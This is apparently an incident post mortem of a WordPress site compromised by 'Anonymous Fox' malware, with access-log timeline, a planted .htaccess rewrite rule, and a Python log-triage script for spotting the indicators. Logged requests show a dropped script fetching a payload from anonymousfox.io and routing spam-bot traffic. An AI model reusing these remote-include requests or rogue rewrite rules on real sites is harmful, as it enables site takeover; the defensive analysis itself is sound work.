WordPress “Anonymous Fox” virus post mortem

Here are notes from a malware investigation. I would later learn the malware goes by "Anonymous Fox", supposedly the pseudonym of its author.

Here are notes from the timeline:

Earliest logs

The logs begin at the end of August 2020, although unfortunately it's likely the compromise occurred earlier.

A successful request for a questionable-looking sitemap from an IP I'd later learn was a bot IP. The path is in fact the sitemap format WordPress core began generating in 5.5 (released earlier that month), and 66.249.79.x is Google's crawler range, so this request on its own is ordinary crawler traffic rather than evidence of compromise.

66.249.79.171 - - [31/Aug/2020:05:30:03 -0700] "GET /wp-sitemap-posts-post-1.xml HTTP/1.1" 200

A POST to xmlrpc.php
I'll be seeing more of this troublesome file. It is a standard part of WordPress core, and its system.multicall method lets a single POST carry hundreds of login attempts, which is why it is so frequently used to stage brute-force password guessing. The trailing 403 below is the response size in bytes, not a status code; the request succeeded with 200.

45.64.122.210 - - [31/Aug/2020:05:34:44 -0700] "POST /xmlrpc.php HTTP/2.0" 200 403

An IP from the bot range that pings the site to this day makes a strange request:

66.249.79.173 - - [31/Aug/2020:06:29:40 -0700] "GET /2020088296/

Post-compromise

Malware has definitely been installed at this point: there is no legitimate plugin "pp" and no script "mm.php" in this install, so for this request to get a 200 response both must already have been written to the server.

23.83.130.164 - - [31/Aug/2020:08:38:06 -0700] "GET /wordpress/wp-content/plugins/pp/mm.php HTTP/2.0" 200 1526

The second request is particularly telling, as the GET request carries the server account's username (redacted here as [user]) in its path parameter. Not good. It hands the site's public document root to mm.php, presumably so the malware can map the server and know where to install all its public-facing goodies.

23.83.130.164 - - [31/Aug/2020:08:38:16 -0700] "GET /wordpress/wp-content/plugins/pp/mm.php?path=/home/[user]/public_html

And away we go: "Anonymous Fox", with its very own public domain of hacking tools. The dropped script is pointed at a payload URL on anonymousfox.io through its php parameter, so the installation is setting up shop and approaching its final form.

123.108.244.2 - - [02/Sep/2020:01:44:26 -0700] "GET /wordpress/wp-content/plugins/pp/dzfkubcdpg.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200

Let the botting commence

The first successful request to a bot endpoint. This would be followed by tens of thousands more over the course of the next 2 weeks.

77.88.5.32 - - [06/Sep/2020:19:00:16 -0700] "GET /soarsound/22150aghi10008549 HTTP/1.1" 200 8558

An .htaccess rewrite rule was added so that these incoming requests are handed to index.php with parameters the on-site malware can consume. At this point they have full read/write access to the server, so finding out exactly what they were up to would require time that I don't have.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
# Rogue rule planted inside the stock WordPress block: any request shaped like
# /<word>/<1-7 digits><4 alphanumerics>... is routed to index.php with the two
# captures exposed as smsite and smid, where the injected code picks them up.
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]
# Note: as reproduced here the final character class has no quantifier, so it
# matches exactly one character and the rule would only accept 6 to 12
# characters after the slash. The 17-character request above would not match
# it, so a trailing + or * was most likely lost when the rule was copied out.
</IfModule>
# END WordPress
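As an added example that is not part of the original post (and not Anonymous Fox's own code), here is a small Python triage script that runs the indicators from this timeline over a handful of constructed log lines modelled on the ones quoted above: POSTs to xmlrpc.php, anything under the rogue pp plugin directory, the path= and php=http:// parameters handed to the dropped scripts, and paths matching the rogue rewrite rule. It also decodes a bot-endpoint path the way the RewriteRule would, so you can see which smsite and smid values the malware receives. One assumption: the rule's trailing character class is given a + quantifier, since as quoted it could not match the 17-character request shown. The sample log's response sizes and the final benign line are made up; the [user] component stays redacted.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample, modelled on the access-log lines quoted in the post.
# Response sizes the post truncated and the last (benign) line are made up;
# the "[user]" home-directory component is kept redacted as in the post.
SAMPLE_LOG = """\
66.249.79.171 - - [31/Aug/2020:05:30:03 -0700] "GET /wp-sitemap-posts-post-1.xml HTTP/1.1" 200 4102
45.64.122.210 - - [31/Aug/2020:05:34:44 -0700] "POST /xmlrpc.php HTTP/2.0" 200 403
23.83.130.164 - - [31/Aug/2020:08:38:06 -0700] "GET /wordpress/wp-content/plugins/pp/mm.php HTTP/2.0" 200 1526
23.83.130.164 - - [31/Aug/2020:08:38:16 -0700] "GET /wordpress/wp-content/plugins/pp/mm.php?path=/home/[user]/public_html HTTP/2.0" 200 88
123.108.244.2 - - [02/Sep/2020:01:44:26 -0700] "GET /wordpress/wp-content/plugins/pp/dzfkubcdpg.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 120
77.88.5.32 - - [06/Sep/2020:19:00:16 -0700] "GET /soarsound/22150aghi10008549 HTTP/1.1" 200 8558
10.0.0.5 - - [06/Sep/2020:19:01:00 -0700] "GET /about/ HTTP/1.1" 200 7300
"""

# Apache common/combined log prefix: ip ident user [ts] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# The rogue .htaccess rule from the post, with one assumption: the trailing
# character class gets a "+" quantifier, since without one the rule could not
# match the 17-character bot endpoint the post shows it serving. The leading
# "/" is optional because .htaccess rules see the path without that prefix.
BOT_ENDPOINT_RE = re.compile(
    r'^/?[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]+$'
)

ROGUE_PLUGIN_DIR = "/wp-content/plugins/pp/"   # plugin that does not exist


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    return entry


def decode_bot_endpoint(path):
    """Apply the rogue rewrite rule: return the smsite/smid it would pass to
    index.php, or None if the path is not a bot endpoint."""
    m = BOT_ENDPOINT_RE.match(path)
    if not m:
        return None
    # RewriteRule ... index.php?smsite=$2&smid=$1
    return {"smsite": m.group(2), "smid": m.group(1)}


def classify(entry):
    """Name every indicator from the post's timeline that one request matches."""
    hits = []
    path, query = entry["path"], entry["query"]
    if entry["method"] == "POST" and path.endswith("/xmlrpc.php"):
        hits.append("xmlrpc-post")            # brute-force staging
    if ROGUE_PLUGIN_DIR in path:
        hits.append("rogue-plugin-pp")        # dropped scripts under plugins/pp/
    if "path" in query:
        hits.append("dropper-path-param")     # document root handed to mm.php
    if any(v.lower().startswith(("http://", "https://"))
           for v in query.get("php", [])):
        hits.append("remote-include")         # ?php=http://... payload fetch
    if decode_bot_endpoint(path):
        hits.append("bot-endpoint")           # traffic consumed via .htaccess
    return hits


def triage(log_text):
    """Return only the suspicious requests, oldest first, with their indicators."""
    flagged = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            flagged.append({"ip": entry["ip"], "ts": entry["ts"],
                            "target": entry["target"], "indicators": hits})
    return flagged


def indicators_by_ip(flagged):
    """Count indicators per source IP so the noisiest attacker addresses surface."""
    counts = Counter()
    for f in flagged:
        counts[f["ip"]] += len(f["indicators"])
    return counts


if __name__ == "__main__":
    flagged = triage(SAMPLE_LOG)
    for f in flagged:
        extra = decode_bot_endpoint(urlsplit(f["target"]).path) or ""
        print(f["ts"], f["ip"], f["target"], ",".join(f["indicators"]), extra)
    print(indicators_by_ip(flagged).most_common())
```

The benign sitemap and /about/ lines fall through untouched, which is the point of the check: the rewrite-rule match and the query-parameter shapes are specific enough that real-world noise such as crawler traffic does not trip them. On a full log, run triage() over the file and sort indicators_by_ip() to get the attacker IPs to block and the first timestamp at which each indicator appears.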

What exactly it was doing is hard to say, although it was communicating most frequently with one domain in another country. Anonymous Fox advertises SMTP and cPanel capabilities in particular, most likely for mass spamming and phishing for sensitive data, using your server's IP as the "origin" so that you are the one who eventually gets traced and shut down, not them.
